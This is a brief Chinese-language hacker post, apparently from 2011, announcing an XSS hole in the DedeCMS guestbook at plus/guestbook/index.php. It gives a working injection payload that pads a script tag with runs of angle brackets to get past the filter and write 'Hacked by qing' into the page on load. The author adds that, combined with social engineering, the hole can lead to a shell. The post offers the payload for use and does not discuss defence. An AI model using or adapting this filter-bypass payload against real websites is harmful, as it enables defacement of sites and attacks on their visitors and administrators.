dedecms 留言本 XSS 漏洞

作者：hack1990 时间：11-09-05 阅读数：728人阅读

2011/9/5/8:58 dedecms 的 0day 又出来了，2011/9/5/8:58 dedecms 留言本 XSS 漏洞。

呵呵。其实只是xss，结合下社工还是可以拿shell的

plus/guestbook/index.php

>>>><<<><<><<><><><<<<<<script>function init() { document.write(\'Hacked by qing\');}window.onload = init;</script> ;<<<<<><<><><<

就可以绕过了……

By：hackqing

相关文章